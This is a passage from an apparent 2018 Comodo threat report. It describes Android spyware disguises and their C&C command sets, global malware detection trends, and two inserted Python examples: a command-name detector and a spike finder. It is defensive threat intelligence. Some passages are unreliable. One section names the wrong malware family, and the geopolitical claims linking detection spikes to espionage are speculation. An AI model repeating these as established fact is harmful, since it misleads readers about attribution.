People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.

Global Threat Report Q2 2018 Edition

Page 29 of 73

412 Zoo Park The next member of the spy family Zoo Park has 4 different versions

Version-1 Telegram Groups انتخاب دھم

Version-2 Postrall Yes For Referendum انتخاب دھم

Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4 VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser's data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of previous versions, it includes some additional tricks:

Extracts photos, audio and videos

Records screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3 FaceBook Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs

Extract contact details

Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather info about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injectors class
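As an added illustration (not code from the report or from Comodo), the command vocabulary listed above can serve as a static indicator: the following Python scans the classes.dex string pool of an APK for those command names and flags a sample only when several family-specific names occur together. The in-memory sample APK, the minimum-hit threshold and the function names are assumptions; the class paths and the benign sample are constructed.

```python
"""Score an APK for Mystery Bot's command vocabulary (hypothetical detector).

Added example, not Comodo's code. It uses only the command names the report
lists above and a constructed in-memory APK, so it runs offline.
"""
import io
import re
import zipfile

# C&C command names taken from the report's list above (spelling as printed).
MYSTERY_BOT_COMMANDS = {
    "Send_SMS", "Send_USSD", "Gethistory", "Start_AllApp", "Send_call",
    "Forward_call", "ResForward_call", "Go_Smsmnd", "Go_GetAlls",
    "Dell_sms", "Send_spam", "Start_Inject",
}

# Printable ASCII runs of 4+ characters, as the `strings` tool would report.
_STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob: bytes) -> set:
    """Return the set of printable ASCII strings embedded in a byte blob."""
    return {m.group().decode("ascii") for m in _STRING_RE.finditer(blob)}


def dex_strings_from_apk(apk_bytes: bytes) -> set:
    """Pull strings from every classes*.dex inside an APK (a zip archive)."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if re.fullmatch(r"classes\d*\.dex", name):
                found |= extract_strings(zf.read(name))
    return found


def score_mystery_bot(apk_bytes: bytes, min_hits: int = 4) -> dict:
    """Count distinct command-name hits; flag at min_hits or more.

    A single generic hit would be noise; the verdict requires several of the
    family-specific names (e.g. "Go_Smsmnd", "ResForward_call") together.
    """
    strings = dex_strings_from_apk(apk_bytes)
    # Dex string pool entries may carry prefixes/suffixes; match as substrings.
    hits = sorted(cmd for cmd in MYSTERY_BOT_COMMANDS
                  if any(cmd in s for s in strings))
    return {"hits": hits, "count": len(hits), "suspicious": len(hits) >= min_hits}


def build_sample_apk(dex_payload: bytes) -> bytes:
    """Constructed sample: a minimal zip with a fake classes.dex (not a real APK)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed manifest/>")
        zf.writestr("classes.dex", dex_payload)
    return buf.getvalue()


# Constructed inputs: one string pool imitating Mystery Bot, one benign app.
SUSPICIOUS_APK = build_sample_apk(
    b"dex\n035\x00" + b"\x00".join(
        [b"Lcom/flashplayer/Main;", b"Send_SMS", b"Send_USSD", b"Gethistory",
         b"Start_AllApp", b"Forward_call", b"Go_Smsmnd", b"Start_Inject"]))
BENIGN_APK = build_sample_apk(
    b"dex\n035\x00" + b"\x00".join(
        [b"Lcom/example/notes/Main;", b"onCreate", b"Send_feedback", b"info"]))

if __name__ == "__main__":
    for label, apk in (("suspicious", SUSPICIOUS_APK), ("benign", BENIGN_APK)):
        print(label, score_mystery_bot(apk))
```

A production rule would pair this string check with the permissions and receivers declared in the manifest, since the names alone can be renamed by the malware author.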

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version_2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1 Netflix Hack Instagram Hack

Version-2 TSF Launcher

Version-3 Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April 2018

4.2.2 May 2018

Chart: Android-targeted malware in May 2018

4.2.3 June 2018

Chart: Android-targeted malware in June 2018

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section, we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section, we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section, we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3, respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
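As an added example (not Comodo's own tooling), the following Python applies the yardstick used above, a day with well over ten times the usual number of detections, to constructed per-ccTLD detection log lines and returns the spike days. The log format, the baseline choice (median of the other days) and the family labels are assumptions.

```python
"""Flag daily detection spikes per ccTLD (hypothetical helper, added here).

Added example, not code from the report. Log lines are assumed to have the
form "YYYY-MM-DD,cctld,family"; the sample below is constructed, not telemetry.
"""
from collections import Counter, defaultdict
from statistics import median

# Constructed sample log: a quiet baseline for "kp" plus one surge on May 2
# (15 detections against a usual 1), and a steady "ru" series with no surge.
SAMPLE_LOG = "\n".join(
    [f"2018-04-{d:02d},kp,HackTool.AutoKMS" for d in range(20, 31)]
    + ["2018-05-01,kp,HackTool.AutoKMS"]
    + ["2018-05-02,kp,HackTool.AutoKMS"] * 9
    + ["2018-05-02,kp,Tool.AntiCensorship"] * 6
    + ["2018-05-03,kp,HackTool.AutoKMS"]
    + [f"2018-04-{d:02d},ru,Worm.Brontok" for d in range(20, 31) for _ in range(3)]
)


def daily_counts(log_text: str) -> dict:
    """Parse 'date,cctld,family' lines into {cctld: {date: count}}."""
    counts = defaultdict(Counter)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        day, cctld, _family = line.split(",", 2)
        counts[cctld][day] += 1
    return counts


def find_spikes(counts: dict, factor: float = 10.0) -> list:
    """Return (cctld, date, count, baseline) for days at or above factor x baseline.

    The baseline is the median of the *other* days, so a single surge cannot
    inflate its own baseline; ccTLDs with fewer than three days are skipped.
    """
    spikes = []
    for cctld, per_day in counts.items():
        if len(per_day) < 3:
            continue
        for day, n in sorted(per_day.items()):
            others = [v for d, v in per_day.items() if d != day]
            baseline = median(others)
            if baseline > 0 and n >= factor * baseline:
                spikes.append((cctld, day, n, baseline))
    return spikes


if __name__ == "__main__":
    for spike in find_spikes(daily_counts(SAMPLE_LOG)):
        print("spike:", spike)
```

On a real feed the next step, as the report does for North Korea, is to break the spike day down by family to see what actually surged.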

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals' bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

